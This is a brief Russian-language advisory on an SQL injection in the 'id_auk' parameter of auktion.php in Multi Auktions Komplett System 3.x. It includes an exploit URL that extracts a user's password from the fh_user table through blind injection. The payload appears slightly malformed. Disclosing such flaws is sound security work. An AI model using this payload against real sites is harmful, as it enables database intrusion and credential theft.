Программа: Multi Auktions Komplett System 3.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "id_auk" сценарием auktion.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii (substring((SELECT
password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1)

Оставить мнение